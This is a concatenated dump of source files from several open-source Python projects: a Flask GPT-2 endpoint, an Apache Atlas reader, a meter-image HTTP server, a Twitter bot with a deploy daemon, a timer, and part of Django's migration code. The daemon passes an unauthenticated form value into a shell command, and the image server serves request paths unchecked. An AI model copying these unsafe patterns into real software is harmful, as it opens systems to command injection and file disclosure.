for date_ in dates:
print(date_)
heart_rate = HeartRateModel.objects(id_=str(current_identity), date=date_).first()
heart_rates.append({
'date': heart_rate.date if heart_rate else None,
'rate': heart_rate.rate if heart_rate else None
})
if not heart_rates:
return '', 204
else:
return heart_rates, 200
``` |
{
"source": "jomit/opengpt2",
"score": 2
} |
#### File: opengpt2/flask_demo/flask_predict_api.py
```python
import pickle
from flask import Flask, request
import json
import os
import numpy as np
import tensorflow as tf
from flasgger import Swagger
from time import time
import model, sample, encoder
app = Flask(__name__)
swagger = Swagger(app)
@app.route('/text-generate')
def inference_gpt2(
model_name='',
seed=None,
nsamples=1,
batch_size=1,
length=None,
temperature=1,
top_k=0,
top_p=1,
models_dir='models',
text = None
):
"""Endpoints takes input text to generate text out of it.
---
parameters:
- name: input_text
in: query
type: number
required: true
- name: model_name
in: query
type: string
enum: ['124M', '355M', '774M', '1558M']
required: true
default: all
"""
start = time()
input_text = request.args.get("input_text")
model_name = request.args.get("model_name")
models_dir = os.path.expanduser(os.path.expandvars(models_dir))
if batch_size is None:
batch_size = 1
assert nsamples % batch_size == 0
enc = encoder.get_encoder(model_name, models_dir)
hparams = model.default_hparams()
with open(os.path.join(models_dir, model_name, 'hparams.json')) as f:
hparams.override_from_dict(json.load(f))
if length is None:
length = hparams.n_ctx // 2
elif length > hparams.n_ctx:
raise ValueError("Can't get samples longer than window size: %s" % hparams.n_ctx)
with tf.Session(graph=tf.Graph()) as sess:
context = tf.placeholder(tf.int32, [batch_size, None])
np.random.seed(seed)
tf.set_random_seed(seed)
output = sample.sample_sequence(
hparams=hparams, length=length,
context=context,
batch_size=batch_size,
temperature=temperature, top_k=top_k, top_p=top_p
)
saver = tf.train.Saver()
ckpt = tf.train.latest_checkpoint(os.path.join(models_dir, model_name))
saver.restore(sess, ckpt)
raw_text = input_text
context_tokens = enc.encode(raw_text)
generated = 0
for _ in range(nsamples // batch_size):
out = sess.run(output, feed_dict={
context: [context_tokens for _ in range(batch_size)]
})[:, len(context_tokens):]
for i in range(batch_size):
generated += 1
text = enc.decode(out[i])
print("=" * 40 + " SAMPLE " + str(generated) + " " + "=" * 40)
print(text)
print("=" * 80)
output = text
elapsed = time() - start
print('Inference time: {}'.format(elapsed))
return output
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000)
``` |
{
"source": "jomit/pyapacheatlas",
"score": 2
} |
#### File: pyapacheatlas/readers/reader.py
```python
from warnings import warn
from collections import OrderedDict
from ..core.util import GuidTracker
from ..core import (
AtlasAttributeDef,
AtlasClassification,
AtlasEntity,
ClassificationTypeDef,
EntityTypeDef
)
from .lineagemixin import LineageMixIn
from . import util as reader_util
class ReaderConfiguration():
"""
A base configuration for the Reader class. Allows you to customize
headers with a source_prefix, target_prefix, and process_prefix for
parsing table and column lineages.
"""
def __init__(self, **kwargs):
super().__init__()
self.value_separator = kwargs.get('value_separator', ';')
self.source_prefix = kwargs.get(
"source_prefix", "Source")
self.target_prefix = kwargs.get(
"target_prefix", "Target")
self.process_prefix = kwargs.get(
"process_prefix", "Process")
self.column_transformation_name = kwargs.get(
"column_transformation_name", "transformation")
class Reader(LineageMixIn):
"""
The base Reader with functionality that supports python dicts.
"""
TEMPLATE_HEADERS = {
"FineGrainColumnLineage": [
"Target table", "Target column", "Target classifications",
"Source table", "Source column", "Source classifications",
"transformation"
],
"TablesLineage": [
"Target table", "Target type", "Target classifications",
"Source table", "Source type", "Source classifications",
"Process name", "Process type"
],
"EntityDefs": [
"Entity TypeName", "name", "description",
"isOptional", "isUnique", "defaultValue",
"typeName", "displayName", "valuesMinCount",
"valuesMaxCount", "cardinality", "includeInNotification",
"indexType", "isIndexable"
],
"ClassificationDefs": [
"classificationName", "entityTypes", "description"
],
"BulkEntities": [
"typeName", "name", "qualifiedName"
],
"UpdateLineage": [
"Target typeName", "Target qualifiedName", "Source typeName",
"Source qualifiedName", "Process name", "Process qualifiedName",
"Process typeName"
],
"ColumnMapping": [
"Source qualifiedName", "Source column", "Target qualifiedName",
"Target column", "Process qualifiedName", "Process typeName",
"Process name"
]
}
def _splitField(self, attrib):
return [e for e in attrib.split(self.config.value_separator) if e]
def __init__(self, configuration, guid=-1000):
"""
Creates the base Reader with functionality that supports python dicts.
:param configuration:
A list of dicts containing at least `Entity TypeName` and `name`
:type configuration:
:class:`~pyapacheatlas.readers.reader.ReaderConfiguration`
:param int guid:
A negative integer to use as the starting counter for entities
created by this reader.
"""
super().__init__()
self.config = configuration
self.guidTracker = GuidTracker(guid)
def _organize_attributes(self, row, existing_entities, ignore=[]):
"""
Organize the row entries into a distinct set of attributes and
relationshipAttributes.
:param dict(str,str) row:
A dict representing the input rows.
:param existing_entities:
A list of existing atlas entities that will be used to infer
any relationship attributes.
:type existing_entities:
dict(str, `:class:~pyapacheatlas.core.entity.AtlasEntity`)
:param list(str) ignore:
A set of keys to ignore and omit from the returned dict.
:return:
A dictionary containing 'attributes' and 'relationshipAttributes'
:rtype: dict(str, dict(str,str))
"""
output = {"attributes": {}, "relationshipAttributes": {}, "root":{}}
for column_name, cell_value in row.items():
# Remove the required attributes so they're not double dipping.
if column_name in ignore:
continue
# Remove any cell with a None / Null attribute
elif cell_value is None:
continue
# If the Attribute key starts with [Relationship]
# Move it to the relation
elif column_name.startswith("[Relationship]"):
cleaned_key = column_name.replace("[Relationship]", "").strip()
if cleaned_key == "meanings":
terms = self._splitField(cell_value)
min_reference = [
{"typeName": "AtlasGlossaryTerm",
"uniqueAttributes": {
"qualifiedName": <EMAIL>(t)
}
} for t in terms
]
else:
# Assuming that we can find this in an existing entity
# TODO: Add support for guid:xxx or typeName/uniqueAttributes.qualifiedName
try:
min_reference = existing_entities[cell_value].to_json(minimum=True)
# LIMITATION: We must have already seen the relationship
# attribute to be certain it can be looked up.
except KeyError:
raise KeyError(
f"The entity {cell_value} should be listed before {row['qualifiedName']}."
)
output["relationshipAttributes"].update(
{cleaned_key: min_reference}
)
# TODO: Add support for Business, Custom
elif column_name.startswith("[root]"):
# This is a root level attribute
cleaned_key = column_name.replace("[root]", "").strip()
output_value = cell_value
if self.config.value_separator in cell_value:
# There's a delimiter in here
output_value = self._splitField(cell_value)
# This seems like a poor place to add business logic like this
if cleaned_key == "classifications":
output_value = [output_value] if not isinstance(output_value, list) else output_value
output_value = [AtlasClassification(c).to_json() for c in output_value]
elif cleaned_key == "labels" and not isinstance(output_value, list):
output_value = [output_value]
output["root"].update( {cleaned_key: output_value} )
else:
output["attributes"].update({column_name: cell_value})
return output
def parse_bulk_entities(self, json_rows):
"""
Create an AtlasEntityWithExtInfo consisting of entities and their attributes
for the given json_rows.
:param list(dict(str,object)) json_rows:
A list of dicts containing at least `typeName`, `name`, and `qualifiedName`
that represents the entity to be uploaded.
:return: An AtlasEntityWithExtInfo with entities for the provided rows.
:rtype: dict(str, list(dict))
"""
# For each row,
# Extract the
# Extract any additional attributes
headers_that_arent_attribs = ["typeName", "name", "qualifiedName", "classifications", "owners", "experts"]
existing_entities = OrderedDict()
# TODO: Remove this once deprecation is removed
classification_column_used = False
for row in json_rows:
if ((row["name"] is None) or (row["typeName"] is None) or
(row["qualifiedName"] is None)):
# An empty row snuck in somehow, skip it.
continue
_extracted = self._organize_attributes(
row,
existing_entities,
headers_that_arent_attribs
)
entity = AtlasEntity(
name=row["name"],
typeName=row["typeName"],
qualified_name=row["qualifiedName"],
guid=self.guidTracker.get_guid(),
attributes=_extracted["attributes"],
relationshipAttributes=_extracted["relationshipAttributes"],
**_extracted["root"]
)
# TODO: Remove at 1.0.0 launch
if "classifications" in row:
classification_column_used = True
entity.classifications = reader_util.string_to_classification(
row["classifications"],
sep=self.config.value_separator)
if "experts" in row or "owners" in row and len( row.get("experts", []) + row.get("owners", []) ) > 0:
experts = []
owners = []
if len(row.get("experts", []) or [])>0:
experts = [{"id":e} for e in row.get("experts", "").split(self.config.value_separator) if e != '']
if len(row.get("owners", []) or [])>0:
owners = [{"id":o} for o in row.get("owners", "").split(self.config.value_separator) if o != '']
entity.contacts = {"Expert": experts, "Owner": owners }
existing_entities.update({row["qualifiedName"]: entity})
output = {"entities": [e.to_json()
for e in list(existing_entities.values())]}
# TODO: Remove this once deprecation is removed
if classification_column_used:
warn("Using `classifications` as a field header is deprecated and will be unsupported in the future."+
" Please use `[root] classifications` instead.")
return output
def parse_entity_defs(self, json_rows):
"""
Create an AtlasTypeDef consisting of entityDefs for the
given json_rows. The columns `Entity TypeName` and `Entity superTypes`
are special and map to typeName and superTypes respectively.
Entity TypeName must be repeated for each row that has a relevant
attribute being defined on it. For example, if you plan on including
five attributes for type X, you would need to have five rows and
each row would have to fill in the Entity TypeName column.
superTypes can be specified all in one cell (default delimiter is `;`
and is controlled by the Reader's configuration) or across multiple
cells. If you specify DataSet in one row for type X and hive_table
for type X in a second row, it will result in a superType
of `[DataSet, hive_table]`.
:param list(dict(str,str)) json_rows:
A list of dicts containing at least `Entity TypeName` and `name`
that represents the metadata for a given entity type's
attributeDefs. Extra metadata will be ignored.
:return: An AtlasTypeDef with entityDefs for the provided rows.
:rtype: dict(str, list(dict))
"""
entities = dict()
entities_to_superTypes = dict()
attribute_metadata_seen = set()
output = {"entityDefs": []}
splitter = lambda attrib: [e for e in attrib.split(self.config.value_separator) if e]
# Required attributes
# Get all the attributes it's expecting official camel casing
# with the exception of "Entity TypeName"
for row in json_rows:
try:
entityTypeName = row["Entity TypeName"]
except KeyError:
raise KeyError("Entity TypeName not found in {}".format(row))
_ = row.pop("Entity TypeName")
# If the user wants to add super types, they might be adding
# multiple on each row. They DON'T NEED TO but they might
entitySuperTypes = []
if "Entity superTypes" in row:
superTypes_string = row.pop("Entity superTypes")
# Might return a None or empty string
if superTypes_string:
entitySuperTypes = splitter(superTypes_string)
# Need to add this entity to the superTypes mapping if it doesn't
# already exist
if entityTypeName in entities_to_superTypes:
entities_to_superTypes[entityTypeName].extend(entitySuperTypes)
else:
entities_to_superTypes[entityTypeName] = entitySuperTypes
# Update all seen attribute metadata
columns_in_row = list(row.keys())
attribute_metadata_seen = attribute_metadata_seen.union(
set(columns_in_row))
# Remove any null cells, otherwise the AttributeDefs constructor
# doesn't use the defaults.
for column in columns_in_row:
if row[column] is None:
_ = row.pop(column)
json_attribute_def = AtlasAttributeDef(**row).to_json()
if entityTypeName not in entities:
entities[entityTypeName] = []
entities[entityTypeName].append( json_attribute_def )
# Create the entitydefs
for entityType in entities:
# Handle super types by de-duping, removing Nones / empty str and
# defaulting to ["DataSet"] if no user input super Types
all_super_types = [t for t in set(entities_to_superTypes[entityType]) if t]
if len(all_super_types) == 0:
all_super_types = ["DataSet"]
local_entity_def = EntityTypeDef(
name=entityType,
attributeDefs=entities[entityType],
# Adding this as a default until I figure
# do this from the excel / json readers.
superTypes=all_super_types
).to_json()
output["entityDefs"].append(local_entity_def)
# Extra attribute metadata (e.g. extra columns / json entries)
# are ignored. Warn the user that this metadata will be ignored.
extra_metadata_warnings = [
i for i in attribute_metadata_seen if i not in AtlasAttributeDef.propertiesEnum]
for extra_metadata in extra_metadata_warnings:
warn(("The attribute metadata \"{}\" is not a part of the Atlas" +
" Attribute Def and will be ignored.").format(
extra_metadata))
return output
def parse_classification_defs(self, json_rows):
"""
Create an AtlasTypeDef consisting of classificationDefs for the
given json_rows.
:param list(dict(str,str)) json_rows:
A list of dicts containing at least `classificationName`.
:return: An AtlasTypeDef with classificationDefs for the provided rows.
:rtype: dict(str, list(dict))
"""
defs = []
for row in json_rows:
try:
classificationTypeName = row["classificationName"]
except KeyError:
raise KeyError("classificationName not found in {}".format(row))
_ = row.pop("classificationName")
# Update all seen attribute metadata
columns_in_row = list(row.keys())
# Remove any null cells, otherwise the TypeDef constructor
# doesn't use the defaults.
for column in columns_in_row:
if row[column] is None:
_ = row.pop(column)
splitter = lambda attrib: [e for e in attrib.split(self.config.value_separator) if e]
if "entityTypes" in row:
row["entityTypes"] = splitter(row["entityTypes"])
if "superTypes" in row:
row["superTypes"] = splitter(row["superTypes"])
if "subTypes" in row:
row["subTypes"] = splitter(row["subTypes"])
json_classification_def = ClassificationTypeDef(classificationTypeName, **row).to_json()
defs.append(json_classification_def)
return {"classificationDefs": defs}
@staticmethod
def make_template():
"""
Generate a template for the given reader.
"""
raise NotImplementedError
``` |
{
"source": "jomjol/water-meter-image-cut",
"score": 3
} |
#### File: water-meter-image-cut/code/water-meter-image-cut.py
```python
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib import parse
import urllib.request
import socketserver
import lib.CutImageClass
import cv2
CutImage = lib.CutImageClass.CutImage()
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
global CutImage
if "/image_tmp/" in self.path:
self.send_response(200)
self.send_header('Content-type', 'image/jpeg')
with open('.'+self.path, 'rb') as file:
self.wfile.write(file.read()) # Read the file and send the contents
if "url=" in self.path:
url = parse.parse_qs(parse.urlparse(self.path).query)['url'][0]
urllib.request.urlretrieve(url, './image_tmp/original.jpg')
result = CutImage.Cut('./image_tmp/original.jpg')
txt = 'Original: <p><img src=/image_tmp/original.jpg></img><p>'
txt = txt + 'Rotate: <p><img src=/image_tmp/rot.jpg></img><p>'
txt = txt + '<p>Aligned Image: <p><img src=/image_tmp/alg.jpg></img><p>'
txt = txt + 'Digital Counter: <p>'
for i in range(len(result[1])):
txt = txt + '<img src=/image_tmp/'+ str(result[1][i][0]) + '.jpg></img>'
txt = txt + '<p>'
txt = txt + 'Analog Meter: <p>'
for i in range(len(result[0])):
txt += '<img src=/image_tmp/'+ str(result[0][i][0]) + '.jpg></img>'
txt = txt + '<p>'
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(bytes(txt, 'UTF-8'))
PORT = 3000
with socketserver.TCPServer(("", PORT), SimpleHTTPRequestHandler) as httpd:
print("serving at port", PORT)
httpd.serve_forever()
``` |
{
"source": "JoM-Lab/JoM",
"score": 2
} |
#### File: JoM/jom/daemon.py
```python
from gevent import monkey
monkey.patch_all()
import sys
import time
import shlex
import bottle
import subprocess
UPDATE_CMD = 'python -m jom.update'
POLLING_CMD = 'python -m jom.polling'
DOCS_CMD = 'cd docs; make html'
# cmd to get the current branch
BRANCH_CMD = 'git branch | grep "*" | cut -d " " -f 2'
# cmd to get the newest commit log
HEAD_CMD = 'git log -n 1 --oneline'
update_proc = None
update_err_msg = ''
polling_proc = None
polling_err_msg = ''
def restart_procs():
'''
restart update and polloing processes.
'''
global update_proc, update_err_msg, polling_proc, polling_err_msg
if update_proc and update_proc.poll() is None:
# if running, kill it first
sys.stderr.write('kill update proc {}\n'.format(update_proc.pid))
update_proc.terminate()
update_proc = subprocess.Popen(shlex.split(UPDATE_CMD),
stdout=open('update.log', 'a', 1),
stderr=subprocess.PIPE)
sys.stderr.write('start update proc {}\n'.format(update_proc.pid))
# reset the error messages
update_err_msg = ''
if polling_proc and polling_proc.poll() is None:
# if running, kill it first
sys.stderr.write('kill polling proc {}\n'.format(polling_proc.pid))
polling_proc.terminate()
polling_proc = subprocess.Popen(shlex.split(POLLING_CMD),
stdout=open('polling.log', 'a', 1),
stderr=subprocess.PIPE)
sys.stderr.write('start polling proc {}\n'.format(polling_proc.pid))
# reset the error messages
polling_err_msg = ''
time.sleep(1)
# check if dead immediately and get error messages
check_status()
def check_status():
'''
Check the status of process and pull out error messages.
'''
global update_err_msg, polling_err_msg
if not update_proc:
update_status = 'not started'
elif update_proc.poll() is None:
update_status = 'running({})'.format(update_proc.pid)
else: # dead
update_status = 'exited({})'.format(update_proc.returncode)
if update_err_msg == '': # haven't pull out
update_err_msg = update_proc.stderr.read().decode('utf-8')
if not polling_proc:
polling_status = 'not started'
elif polling_proc.poll() is None:
polling_status = 'running({})'.format(polling_proc.pid)
else: # dead
polling_status = 'exited({})'.format(polling_proc.returncode)
if polling_err_msg == '': # haven't pull out
polling_err_msg = polling_proc.stderr.read().decode('utf-8')
# regenerate docs
subprocess.getstatusoutput(DOCS_CMD)
return update_status, polling_status
@bottle.post('/checkout')
def checkout():
'''
Change current branch.
'''
branch = bottle.request.forms.get('branch')
(st, output) = subprocess.getstatusoutput('git checkout ' + branch)
if st != 0:
return 'error {} in pull: {}'.format(st, output)
restart_procs()
return '{} {}'.format(*check_status())
@bottle.get('/hook')
@bottle.post('/hook')
def hook():
'''
Pull commits from remote server and restart processes.
'''
# data = bottle.request.json
(st, output) = subprocess.getstatusoutput('git pull')
if st != 0:
return 'error {} in pull: {}'.format(st, output)
restart_procs()
return '{} {}'.format(*check_status())
@bottle.route('/docs/<p:re:.*>')
@bottle.auth_basic(lambda username, password:
username == 'jom' and password == '<PASSWORD>')
def serve_docs(p=''):
if not p:
p = 'index.html'
return bottle.static_file(p, root='docs/_build/html')
@bottle.route('/')
@bottle.auth_basic(lambda username, password:
username == 'jom' and password == '<PASSWORD>')
def main():
'''
Display HTML.
'''
(st, branch) = subprocess.getstatusoutput(BRANCH_CMD)
(st, head) = subprocess.getstatusoutput(HEAD_CMD)
update_status, polling_status = check_status()
return '''\
<html><body>
<form action="/checkout" method="post">
current branch: {branch}
<input name="branch" type="text"/>
<input value="checkout" type="submit"/></form><br/>
current HEAD: {head}
<a href="/hook"><button type="button">pull and restart</button></a><br/><br/>
update proc: {update_status}<br/>
<pre>{update_err_msg}</pre><br/>
pollinging proc: {polling_status}<br/>
<pre>{polling_err_msg}</pre><br/>
<a href="/docs/">docs</a>
</body></html>
'''.format(branch=branch,
head=head,
update_status=update_status,
update_err_msg=update_err_msg,
polling_status=polling_status,
polling_err_msg=polling_err_msg)
if __name__ == '__main__':
restart_procs()
bottle.run(host='', port=8888, debug=True, server='gevent')
```
#### File: JoM/jom/db.py
```python
import re
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import create_engine, Column, Integer, BigInteger, Text, Boolean, func
from sqlalchemy.dialects.postgresql import TIMESTAMP, JSONB
from sqlalchemy.orm import sessionmaker
Base = declarative_base()
class Tweet(Base):
""" Representation of Tweet instance in database. """
__tablename__ = 'tweets'
#: tweet numeric id (primary key)
id = Column(BigInteger, primary_key=True)
#: sender's user_id
user_id = Column(BigInteger)
#: type of tweet: tweet, reply, rt, quote
type = Column(Text)
#: timestamp when tweet
timestamp = Column(BigInteger)
#: json data
tweet = Column(Text)
#: main content of tweet
text = Column(Text)
#: whether is already deleted online
deleted = Column(Boolean)
class Quote(Base):
""" Representation of Quote instance in database. """
__tablename__ = 'quote'
#: tweet numeric id (primary key)
id = Column(Integer, primary_key=True)
#: timestamp of the quote
timestamp = Column(BigInteger)
#: user id of the person who made the quote
user_id = Column(BigInteger)
#: main content
text = Column(Text)
class Follow(Base):
""" Representation of following/follower change instance in database. """
__tablename__ = 'follow'
#: unique id
id = Column(Integer, primary_key=True)
#: timestamp when action happens
timestamp = Column(BigInteger)
#: user id of the actor
user_id = Column(BigInteger)
#: numeric id of target
target_id = Column(BigInteger)
#: screen_name of target
target_name = Column(Text)
#: type of action: unfo, fo, unfoed, foed
action = Column(Text)
class Bio(Base):
""" Representation of bio change instance in database. """
__tablename__ = 'bio'
#: unique id
id = Column(Integer, primary_key=True)
#: timestamp when bio changes
timestamp = Column(TIMESTAMP)
#: bio json data
bio = Column(JSONB)
def re_fn(pat, item):
"""Customized search function.
:param str pat: pattern
:param str item: target
:return: if item matches pattern
:rtype: bool
"""
try:
reg = re.compile(pat, re.I) # perform case-insensitive matching
return reg.search(item) is not None
except re.error:
return False
def new_session(debug=False):
"""Create new database session.
HOWTO init PostgreSQL database::
sudo -i -u postgres
initdb --locale en_US.UTF-8 -E UTF8 -D '/var/lib/postgres/data'
sudo systemctl start postgresql.service
createuser -s -e -d jom
createdb jom -U jom
:return: a database session
:rtype: DBSession
"""
engine = create_engine('postgresql://jom:@localhost/jom', echo=debug)
Base.metadata.create_all(engine)
DBSession = sessionmaker(engine)
session = DBSession()
return session
def check_deleted(session, tweets):
"""Check if there are tweets in DB are deleted online based on
these existing tweets.
:type tweets: Dict
:param tweets: list of tweets of someone sorted by id descendingly
"""
user_id = tweets[-1]['user']['id']
since_id = tweets[-1]['id']
tweets_in_db = session.query(Tweet)\
.filter((Tweet.user_id == user_id) &
(Tweet.id >= since_id))\
.order_by(Tweet.id.desc()).all()
dels = []
tweets = tweets[:] # make a copy
# check backwards
while tweets and tweets_in_db:
if tweets_in_db[-1].id < tweets[-1]['id']:
dels.append(tweets_in_db.pop())
elif tweets_in_db[-1].id > tweets[-1]['id']:
tweets.pop()
elif tweets_in_db[-1].id == tweets[-1]['id']:
tweets_in_db.pop()
tweets.pop()
# dels.extend(tweets_in_db)
for t in dels:
t.deleted = True
session.add(t)
session.commit()
return dels
if __name__ == '__main__':
import json
victims = json.load(open('config.json'))['victims']
name2id = {u['ref_screen_name']: _id for _id, u in victims.items()}
session = new_session(debug=True)
for i in session.query(Tweet.text)\
.filter((Tweet.user_id == name2id['masked']) &
(Tweet.type == 'tweet'))\
.filter(Tweet.text.op('~')('23*3'))\
.order_by(func.random()).limit(5):
print(i.text)
```
#### File: JoM/jom/resp.py
```python
class Resp:
def __init__(self, *, message=None, fileobj=None, keyboard=None,
preview=False, markdown=False, inline=None):
self.message = message
self.fileobj = fileobj
self.keyboard = keyboard
self.preview = preview
self.markdown = markdown
self.inline = inline
```
#### File: JoM/jom/twitter.py
```python
import json
from requests.exceptions import ConnectionError
from rauth import OAuth1Session
_twitter = None
def twitter():
"""Return a session to call twitter api.
:return: a requests session
:rtype: OAuth1Session
"""
global _twitter
if _twitter is None:
globals().update(json.load(open('secret.json')))
_twitter = OAuth1Session(consumer_key=CONSUMER_KEY,
consumer_secret=CONSUMER_SECRET,
access_token=ACCESS_KEY,
access_token_secret=ACCESS_SECRET)
return _twitter
def get_ratelimit():
"""Get twitter api rate limit status.
:return: rate limit for each api
:rtype: Dict
"""
return twitter().get('https://api.twitter.com/1.1/'
'application/rate_limit_status.json').json()
def get_user_info(user_id):
"""Returns a variety of information about the user specified by `user_id`.
:param str user: target's Twitter user id
:rtype: Dict
"""
return twitter().get('https://api.twitter.com/1.1/users/show.json', params=dict(user_id=user_id)).json()
def get_tweets(user_id, max_id=None):
"""Get tweets from one's timeline
:param str user: target's Twitter user id
:param max_id: the id of last tweet in range, defaults to be None
:type max_id: int | None
:return: result from API call, a list of tweets
:rtype: List[Dict]
"""
p = dict(user_id=user_id, count=200,
exclude_replies=False, include_rts=True)
if max_id is not None:
p['max_id'] = max_id
while 1:
try:
r = twitter().get('https://api.twitter.com/1.1'
'/statuses/user_timeline.json',
params=p)
break
except ConnectionError:
pass
return r.json()
def get_f(user_id, ftype):
"""Get one's follower/following
:param str user_id: target's user id
:param str ftype: follower or following
:return: a mapping from follower/following id to screen name
:rtype: Dict
"""
p = dict(user_id=user_id, count=200, stringify_ids=True,
include_user_entities=True, cursor=-1)
f = []
if ftype == 'follower':
resource_uri = 'https://api.twitter.com/1.1/followers/list.json'
elif ftype == 'following':
resource_uri = 'https://api.twitter.com/1.1/friends/list.json'
else:
raise Exception('Unknown type: ' + ftype)
while True:
while 1:
try:
j = twitter().get(resource_uri, params=p).json()
break
except ConnectionError:
pass
if 'errors' in j:
raise Exception(j['errors'])
if 'error' in j:
raise Exception(j['error'])
f.extend([(str(u['id']), u['screen_name']) for u in j['users']])
if j['next_cursor'] != 0:
p['cursor'] = j['next_cursor']
else:
break
return dict(f)
def fetch_conversation(sid):
''' Fetch conversation by tweet id via twitter api.
:param sid: tweet id
:type sid: str | int
:return: list of tweets
:rtype: List[Dict]
'''
threads = twitter().get('https://api.twitter.com/1.1/conversation/show.json',
params=dict(id=sid, include_entities=1)).json()
return [] if 'errors' in threads else threads
def ids2names(ids):
"""Twitter user ids to screen names.
:param List[int] ids: user ids
:return: list of corresponding names
:rtype: List[str]
"""
users = twitter().get('https://api.twitter.com/1.1/friendships/lookup.json',
params=dict(user_id=','.join(map(str, ids)))).json()
names = []
i, n = 0, len(users)
for _id in ids:
if i < n and users[i]['id'] == _id:
names.append(users[i]['screen_name'])
i += 1
else:
names.append(None)
return names
def names2ids(names):
"""Twitter screen names to user ids.
:param List[str] ids: screen names
:return: list of corresponding user ids
:rtype: List[int]
"""
users = twitter().get('https://api.twitter.com/1.1/friendships/lookup.json',
params=dict(screen_name=','.join(map(str, names)))).json()
ids = []
i, n = 0, len(users)
for name in names:
if i < n and users[i]['screen_name'] == name:
ids.append(users[i]['id'])
i += 1
else:
ids.append(None)
return ids
``` |
{
"source": "jomlearn2/clock",
"score": 4
} |
#### File: jomlearn2/clock/timer.py
```python
from os import system, name
import time
from datetime import datetime, timedelta
# defining setcount function /setting the countdown
def setcount():
global hrs
global mins
global secs
global totalsecs
print('Set the countdown timer:')
hrs = int(input('hours: '))
mins = int(input('minutes: '))
secs = int(input('seconds: '))
totalsecs = 3600 * hrs + 60 * mins + secs
# defining countdown function /running the countdown
def countdown():
run = str(input('Start? (y/n) > '))
# Only run if the user types in "y"
if run == "y":
ltotalsecs = totalsecs
while ltotalsecs != 0:
sec = timedelta(seconds=int(ltotalsecs))
d = datetime(1, 1, 1) + sec
print("%d hours %d minutes %d seconds left" % (d.hour, d.minute, d.second))
# delay for a second
time.sleep(1)
# decrement the local seconds total
ltotalsecs -= 1
# clearing the previous statement
clear()
if ltotalsecs == 0:
print('Time is UP!')
# defining clear function
def clear():
# for windows
if name == 'nt':
a = system('cls')
# for mac and linux(here, os.name is 'posix')
else:
_ = system('clear')
setcount()
countdown()
``` |
{
"source": "jommerce/django",
"score": 2
} |
#### File: migrations/operations/models.py
```python
from django.db import models
from django.db.migrations.operations.base import Operation
from django.db.migrations.state import ModelState
from django.db.migrations.utils import field_references, resolve_relation
from django.db.models.options import normalize_together
from django.utils.functional import cached_property
from .fields import AddField, AlterField, FieldOperation, RemoveField, RenameField
def _check_for_duplicates(arg_name, objs):
used_vals = set()
for val in objs:
if val in used_vals:
raise ValueError(
"Found duplicate value %s in CreateModel %s argument." % (val, arg_name)
)
used_vals.add(val)
class ModelOperation(Operation):
def __init__(self, name):
self.name = name
@cached_property
def name_lower(self):
return self.name.lower()
def references_model(self, name, app_label):
return name.lower() == self.name_lower
def reduce(self, operation, app_label):
return super().reduce(operation, app_label) or self.can_reduce_through(
operation, app_label
)
def can_reduce_through(self, operation, app_label):
return not operation.references_model(self.name, app_label)
class CreateModel(ModelOperation):
"""Create a model's table."""
serialization_expand_args = ["fields", "options", "managers"]
def __init__(self, name, fields, options=None, bases=None, managers=None):
self.fields = fields
self.options = options or {}
self.bases = bases or (models.Model,)
self.managers = managers or []
super().__init__(name)
# Sanity-check that there are no duplicated field names, bases, or
# manager names
_check_for_duplicates("fields", (name for name, _ in self.fields))
_check_for_duplicates(
"bases",
(
base._meta.label_lower
if hasattr(base, "_meta")
else base.lower()
if isinstance(base, str)
else base
for base in self.bases
),
)
_check_for_duplicates("managers", (name for name, _ in self.managers))
def deconstruct(self):
kwargs = {
"name": self.name,
"fields": self.fields,
}
if self.options:
kwargs["options"] = self.options
if self.bases and self.bases != (models.Model,):
kwargs["bases"] = self.bases
if self.managers and self.managers != [("objects", models.Manager())]:
kwargs["managers"] = self.managers
return (self.__class__.__qualname__, [], kwargs)
def state_forwards(self, app_label, state):
state.add_model(
ModelState(
app_label,
self.name,
list(self.fields),
dict(self.options),
tuple(self.bases),
list(self.managers),
)
)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.create_model(model)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
model = from_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.delete_model(model)
def describe(self):
return "Create %smodel %s" % (
"proxy " if self.options.get("proxy", False) else "",
self.name,
)
@property
def migration_name_fragment(self):
return self.name_lower
def references_model(self, name, app_label):
name_lower = name.lower()
if name_lower == self.name_lower:
return True
# Check we didn't inherit from the model
reference_model_tuple = (app_label, name_lower)
for base in self.bases:
if (
base is not models.Model
and isinstance(base, (models.base.ModelBase, str))
and resolve_relation(base, app_label) == reference_model_tuple
):
return True
# Check we have no FKs/M2Ms with it
for _name, field in self.fields:
if field_references(
(app_label, self.name_lower), field, reference_model_tuple
):
return True
return False
def reduce(self, operation, app_label):
if (
isinstance(operation, DeleteModel)
and self.name_lower == operation.name_lower
and not self.options.get("proxy", False)
):
return []
elif (
isinstance(operation, RenameModel)
and self.name_lower == operation.old_name_lower
):
return [
CreateModel(
operation.new_name,
fields=self.fields,
options=self.options,
bases=self.bases,
managers=self.managers,
),
]
elif (
isinstance(operation, AlterModelOptions)
and self.name_lower == operation.name_lower
):
options = {**self.options, **operation.options}
for key in operation.ALTER_OPTION_KEYS:
if key not in operation.options:
options.pop(key, None)
return [
CreateModel(
self.name,
fields=self.fields,
options=options,
bases=self.bases,
managers=self.managers,
),
]
elif (
isinstance(operation, AlterModelManagers)
and self.name_lower == operation.name_lower
):
return [
CreateModel(
self.name,
fields=self.fields,
options=self.options,
bases=self.bases,
managers=operation.managers,
),
]
elif (
isinstance(operation, AlterTogetherOptionOperation)
and self.name_lower == operation.name_lower
):
return [
CreateModel(
self.name,
fields=self.fields,
options={
**self.options,
**{operation.option_name: operation.option_value},
},
bases=self.bases,
managers=self.managers,
),
]
elif (
isinstance(operation, AlterOrderWithRespectTo)
and self.name_lower == operation.name_lower
):
return [
CreateModel(
self.name,
fields=self.fields,
options={
**self.options,
"order_with_respect_to": operation.order_with_respect_to,
},
bases=self.bases,
managers=self.managers,
),
]
elif (
isinstance(operation, FieldOperation)
and self.name_lower == operation.model_name_lower
):
if isinstance(operation, AddField):
return [
CreateModel(
self.name,
fields=self.fields + [(operation.name, operation.field)],
options=self.options,
bases=self.bases,
managers=self.managers,
),
